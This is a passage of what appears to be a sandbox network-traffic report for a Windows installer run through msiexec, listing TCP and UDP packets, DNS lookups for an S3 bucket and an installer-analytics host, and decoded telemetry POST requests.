Jan 3, 2023 16:29:21.102236986 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.102257013 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:21.102272987 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.102304935 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:21.152288914 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:21.152318954 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.199166059 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:21.247385979 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.247402906 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.247468948 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.247534990 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.247672081 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:21.247672081 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:21.247725964 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.247833014 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:21.392734051 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.392819881 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.392839909 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.393053055 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.393090963 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.393110037 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.393131971 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.393161058 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:21.393166065 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.393214941 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.393255949 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:21.393285036 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:21.393347979 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:21.395001888 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:21.395045996 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.395090103 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:21.395107985 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:41.930022955 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:42.074728966 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:42.074917078 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:42.075193882 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:42.075500965 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:42.219491005 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:42.219683886 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:42.228162050 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:42.228369951 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:42.248527050 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:42.248577118 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:42.393105984 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:42.395776033 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:42.395859957 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:42.397407055 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:42.397522926 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:42.541876078 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:42.546180010 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:42.546298027 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:42.547753096 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:42.547821999 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:42.692157030 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:42.698998928 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:42.699140072 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:42.715624094 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:42.715624094 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:42.860423088 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:42.863286972 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:42.863410950 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:42.864983082 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:42.865053892 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.009473085 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:43.012469053 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:43.012563944 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.016005993 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.016083002 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.160547018 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:43.163583040 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:43.163675070 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.166198015 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.166198015 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.310925961 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:43.313740969 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:43.313838005 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.315378904 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.315414906 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.459976912 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:43.464976072 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:43.465085030 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.466454983 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.466685057 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.611098051 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:43.613648891 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:43.613820076 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.615288019 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.617717028 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.762171984 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:43.764214993 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:43.764374018 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.765887976 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.765942097 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.910368919 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:43.913949966 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:43.914107084 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.918600082 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:43.918776035 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:44.063240051 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:44.065834999 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:44.065921068 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:44.069123983 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:44.069174051 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:44.213665962 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:44.216160059 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:44.216300964 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:44.223335981 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:44.223479986 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:44.368087053 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:44.545413971 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:44.545567036 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:44.691567898 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:44.691567898 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:44.838849068 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:44.857429028 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:44.857534885 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:44.968442917 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:44.968509912 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:45.113229036 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:45.116472960 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:45.116575003 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:45.125978947 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:45.125978947 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:45.270632982 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:45.273708105 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:45.273870945 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:45.316477060 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:45.316533089 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:45.461246967 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:45.464123011 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:45.464262962 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:46.054251909 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:46.054326057 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:46.198896885 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:46.225176096 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:46.225291967 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:46.243607998 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:46.243696928 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:46.388319969 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:46.480237007 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:46.480370045 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:46.633758068 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:46.633814096 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:46.778342009 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:46.796173096 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:46.796279907 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:48.245763063 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:48.245763063 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:48.390405893 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:48.392822981 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:48.394109011 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:48.415009022 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:48.415009022 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:48.559674978 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:48.703802109 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:48.704067945 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:48.708717108 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:48.708717108 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:48.853087902 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:48.855344057 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:48.856241941 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:48.863647938 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:48.863647938 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.008127928 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:49.010416031 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:49.010701895 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.012979984 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.013185024 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.158584118 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:49.160948992 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:49.161652088 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.166666031 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.166666031 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.311146021 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:49.314049006 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:49.314157009 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.315954924 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.316024065 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.460371971 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:49.463071108 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:49.464178085 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.465123892 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.465123892 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.609520912 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:49.612215996 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:49.614137888 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.620990992 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.620990992 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.766197920 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:49.768258095 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:49.768399000 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.770538092 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.770538092 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.915309906 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:49.918270111 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:49.918746948 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.920111895 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:49.920111895 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.064800978 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:50.067877054 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:50.069251060 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.070159912 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.070159912 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.214565039 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:50.217505932 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:50.217901945 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.222080946 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.222080946 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.366970062 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:50.369718075 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:50.369899035 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.374752998 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.374823093 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.521614075 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:50.524204016 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:50.524538040 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.527584076 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.527584076 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.672089100 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:50.674599886 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:50.674823999 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.676558018 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.676558018 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.821366072 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:50.828094006 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:50.828166962 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.830823898 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.830890894 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.975194931 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:50.978033066 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:50.978142977 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.980161905 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:50.980287075 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:51.124674082 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:51.130179882 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:51.130640984 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:51.133243084 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:51.133243084 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:51.277743101 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:51.290532112 CET	80	49713	54.205.202.31	192.168.2.7
Jan 3, 2023 16:29:51.290808916 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:51.805259943 CET	49713	80	192.168.2.7	54.205.202.31
Jan 3, 2023 16:29:55.449424028 CET	49714	80	192.168.2.7	20.203.138.85
Jan 3, 2023 16:29:55.467863083 CET	80	49714	20.203.138.85	192.168.2.7
Jan 3, 2023 16:29:55.467958927 CET	49714	80	192.168.2.7	20.203.138.85
Jan 3, 2023 16:29:55.468615055 CET	49714	80	192.168.2.7	20.203.138.85
Jan 3, 2023 16:29:55.486179113 CET	80	49714	20.203.138.85	192.168.2.7
Jan 3, 2023 16:29:55.535834074 CET	80	49714	20.203.138.85	192.168.2.7
Jan 3, 2023 16:29:55.686536074 CET	49714	80	192.168.2.7	20.203.138.85
Jan 3, 2023 16:30:00.541026115 CET	80	49714	20.203.138.85	192.168.2.7
Jan 3, 2023 16:30:00.544605017 CET	49714	80	192.168.2.7	20.203.138.85

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2023 16:29:18.750794888 CET	60326	53	192.168.2.7	8.8.8.8
Jan 3, 2023 16:29:18.779248953 CET	53	60326	8.8.8.8	192.168.2.7
Jan 3, 2023 16:29:41.908813000 CET	50505	53	192.168.2.7	8.8.8.8
Jan 3, 2023 16:29:41.926369905 CET	53	50505	8.8.8.8	192.168.2.7
Jan 3, 2023 16:29:55.652678013 CET	61178	53	192.168.2.7	8.8.8.8
Jan 3, 2023 16:29:55.670830965 CET	53	61178	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 3, 2023 16:29:18.750794888 CET	192.168.2.7	8.8.8.8	0xbcc2	Standard query (0)	mzrdmodlonnce.s3.amazonaws.com	A (IP address)	IN (0x0001)	false
Jan 3, 2023 16:29:41.908813000 CET	192.168.2.7	8.8.8.8	0x79ef	Standard query (0)	collect.installeranalytics.com	A (IP address)	IN (0x0001)	false
Jan 3, 2023 16:29:55.652678013 CET	192.168.2.7	8.8.8.8	0x3867	Standard query (0)	amxx1515cabreun23.asxo	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 3, 2023 16:29:18.779248953 CET	8.8.8.8	192.168.2.7	0xbcc2	No error (0)	mzrdmodlonnce.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 3, 2023 16:29:18.779248953 CET	8.8.8.8	192.168.2.7	0xbcc2	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 3, 2023 16:29:18.779248953 CET	8.8.8.8	192.168.2.7	0xbcc2	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.17.120	A (IP address)	IN (0x0001)	false
Jan 3, 2023 16:29:18.779248953 CET	8.8.8.8	192.168.2.7	0xbcc2	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.165.169	A (IP address)	IN (0x0001)	false
Jan 3, 2023 16:29:18.779248953 CET	8.8.8.8	192.168.2.7	0xbcc2	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.136.27	A (IP address)	IN (0x0001)	false
Jan 3, 2023 16:29:18.779248953 CET	8.8.8.8	192.168.2.7	0xbcc2	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.135.41	A (IP address)	IN (0x0001)	false
Jan 3, 2023 16:29:18.779248953 CET	8.8.8.8	192.168.2.7	0xbcc2	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.138.99	A (IP address)	IN (0x0001)	false
Jan 3, 2023 16:29:18.779248953 CET	8.8.8.8	192.168.2.7	0xbcc2	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.229.9	A (IP address)	IN (0x0001)	false
Jan 3, 2023 16:29:18.779248953 CET	8.8.8.8	192.168.2.7	0xbcc2	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.245.28	A (IP address)	IN (0x0001)	false
Jan 3, 2023 16:29:18.779248953 CET	8.8.8.8	192.168.2.7	0xbcc2	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.134.57	A (IP address)	IN (0x0001)	false
Jan 3, 2023 16:29:41.926369905 CET	8.8.8.8	192.168.2.7	0x79ef	No error (0)	collect.installeranalytics.com		54.205.202.31	A (IP address)	IN (0x0001)	false
Jan 3, 2023 16:29:41.926369905 CET	8.8.8.8	192.168.2.7	0x79ef	No error (0)	collect.installeranalytics.com		54.163.120.186	A (IP address)	IN (0x0001)	false
Jan 3, 2023 16:29:55.670830965 CET	8.8.8.8	192.168.2.7	0x3867	Name error (3)	amxx1515cabreun23.asxo	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

mzrdmodlonnce.s3.amazonaws.com

collect.installeranalytics.com

20.203.138.85

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49710	3.5.17.120	443	C:\Windows\SysWOW64\msiexec.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49713	54.205.202.31	80	C:\Windows\SysWOW64\msiexec.exe

Timestamp	kBytes transferred	Direction	Data
Jan 3, 2023 16:29:42.075193882 CET	2128	OUT	POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64) Host: collect.installeranalytics.com Content-Length: 168 Cache-Control: no-cache
Jan 3, 2023 16:29:42.075500965 CET	2129	OUT	Data Raw: 71 74 3d 34 33 36 32 32 39 36 26 74 3d 6c 69 66 65 63 79 63 6c 65 26 6c 63 3d 73 74 61 72 74 26 76 3d 33 26 61 69 64 3d 36 33 62 34 30 65 63 63 39 37 39 31 32 65 36 31 39 32 37 63 32 31 65 61 26 61 76 3d 35 2e 33 2e 31 32 2e 32 26 63 69 64 3d 46 Data Ascii: qt=4362296&t=lifecycle&lc=start&v=3&aid=63b40ecc97912e61927c21ea&av=5.3.12.2&cid=FC888238B97E5BCEB3ADDA923462A5C50A254CD3&sid=%7B313622DF-58D1-4508-BE49-26CDA366CBBC%7D
Jan 3, 2023 16:29:42.228162050 CET	2129	IN	HTTP/1.1 200 OK Cache-control: no-cache="set-cookie" Date: Tue, 03 Jan 2023 15:29:42 GMT Set-Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C714AFACF77A4F69E095B13BEB54A44F6D6FDE76EA6BC261E999ADA8FB71057DDC1A795CE3E5815134F9A9936538410FA;PATH=/;MAX-AGE=600 X-Powered-By: Express Content-Length: 0 Connection: keep-alive
Jan 3, 2023 16:29:42.248527050 CET	2130	OUT	POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64) Host: collect.installeranalytics.com Content-Length: 180 Cache-Control: no-cache Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C714AFACF77A4F69E095B13BEB54A44F6D6FDE76EA6BC261E999ADA8FB71057DDC1A795CE3E5815134F9A9936538410FA
Jan 3, 2023 16:29:42.248577118 CET	2130	OUT	Data Raw: 71 74 3d 34 33 36 32 37 30 33 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 56 65 72 73 69 6f 6e 4e 54 26 76 61 6c 3d 31 30 30 30 26 76 3d 33 26 61 69 64 3d 36 33 62 34 30 65 63 63 39 37 39 31 32 65 36 31 39 32 37 63 32 31 65 61 26 61 76 3d 35 2e Data Ascii: qt=4362703&t=property&lb=VersionNT&val=1000&v=3&aid=63b40ecc97912e61927c21ea&av=5.3.12.2&cid=FC888238B97E5BCEB3ADDA923462A5C50A254CD3&sid=%7B313622DF-58D1-4508-BE49-26CDA366CBBC%7D
Jan 3, 2023 16:29:42.395776033 CET	2130	IN	HTTP/1.1 200 OK Date: Tue, 03 Jan 2023 15:29:42 GMT X-Powered-By: Express Content-Length: 0 Connection: keep-alive
Jan 3, 2023 16:29:42.397407055 CET	2130	OUT	POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64) Host: collect.installeranalytics.com Content-Length: 182 Cache-Control: no-cache Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C714AFACF77A4F69E095B13BEB54A44F6D6FDE76EA6BC261E999ADA8FB71057DDC1A795CE3E5815134F9A9936538410FA
